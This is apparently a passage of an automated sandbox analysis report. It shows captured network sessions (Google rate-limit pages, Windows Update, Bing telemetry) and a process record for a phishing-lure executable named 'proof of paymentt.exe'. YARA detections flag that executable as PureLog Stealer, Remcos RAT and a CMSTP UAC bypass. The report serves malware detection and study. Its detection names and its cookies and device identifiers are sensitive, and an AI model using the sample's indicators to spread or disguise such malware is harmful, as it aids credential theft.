domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 09:21:06 UTC	6	IN	Data Raw: 3c 48 54 4d 4c 3e Data Ascii: <HTML>
2024-05-03 09:21:06 UTC	411	IN	Data Raw: 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 61 6d 70 3b 71 3d Data Ascii: <HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	142.251.41.4	443	5684	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:07 UTC	920	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YOPbGIHZ0rEGIjB_Qkm3crtF5Diayds78MQPvcGWLxph33UahTGVaOvK_O2C395pW0j53DoBQmglIRIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-03-09; NID=513=kf08ap03Enu5vH37Q9HwnjLUtxfa6l9M-obfy7WtzK2ZMJeTXigT5vVPCPaqgLe-8OzIDVElm82UrleNC9YlYfv7bkgGrz69oUBmTJ3MAv6roDxmYcpgpXDdKlv1QN9yg_UY_Y6aYr6PryPeLIu0zDCI1ApCUnSIaKK2o2tpjLQ
2024-05-03 09:21:07 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 03 May 2024 09:21:07 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 09:21:07 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-05-03 09:21:07 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 7a 63 68 4b 35 31 6a 4c 63 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="zchK51jLc
2024-05-03 09:21:07 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49723	142.251.41.4	443	5684	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:08 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YOPbGIHZ0rEGIjDiV69rK5qM04HlVCP5HIxKT4yFlyXGN87fd-gxnuiXdKGTW6789z2jSG8fGE3fLfIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-03-09; NID=513=LlUHQLr5Y133oMGNzEa_SRif_xUDN8HY8u4HhyWXXk0hbbeVRnqkU6_cYn6XuNP9iSnwoQM46aM2DIhUrR3ksC4ODkTNTP2EulpgsMZFBF7hobj7s2cdGaRL-gaeDymBN1kscScb2mGnBHyhG5GD0ZhuJa8JFCTcQ9CmCCLOoKE
2024-05-03 09:21:08 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 03 May 2024 09:21:08 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-03 09:21:08 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-05-03 09:21:08 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 63 5f 34 54 4e 4a 54 4f 49 39 35 4d 4d 2d 70 70 73 65 56 66 6c 41 31 59 59 79 38 55 4e 41 48 57 54 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="c_4TNJTOI95MM-ppseVflA1YYy8UNAHWT
2024-05-03 09:21:08 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49726	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:13 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7nm+GBGyeGaenUO&MD=Fmagl9TN HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-03 09:21:14 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 0280f95f-067b-4e02-b15f-a0b5afcee2d1 MS-RequestId: f8494c29-be70-4dde-a843-4009ead05cce MS-CV: FBNxucPFr0O+ItJn.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 03 May 2024 09:21:13 GMT Connection: close Content-Length: 24490
2024-05-03 09:21:14 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-03 09:21:14 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49729	23.1.237.91	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:14 UTC	2148	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900D492 X-BM-CBT: 1696428841 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900D492 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 2484 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714728042053&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-05-03 09:21:14 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-05-03 09:21:14 UTC	2483	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-05-03 09:21:14 UTC	480	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 7FC71A0E1F654749B63358F275FF89AD Ref B: LAX311000112029 Ref C: 2024-05-03T09:21:14Z Date: Fri, 03 May 2024 09:21:14 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.57ed0117.1714728074.109330e2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49733	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:21:53 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7nm+GBGyeGaenUO&MD=Fmagl9TN HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-03 09:21:53 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 53321247-919f-4808-acbf-55f078fea7dd MS-RequestId: d3814dff-3b3d-4447-bf6d-ee7e48f4999f MS-CV: CHpn7twnSUO10R6N.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 03 May 2024 09:21:53 GMT Connection: close Content-Length: 25457
2024-05-03 09:21:53 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-03 09:21:53 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	11:20:52
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\proof of paymentt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\proof of paymentt.exe"
Imagebase:	0x580000
File size:	976'896 bytes
MD5 hash:	1EDF4AB8BD9F71ADA01B5CD4763C555D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2041298477.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:20:53
Start date:	03/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
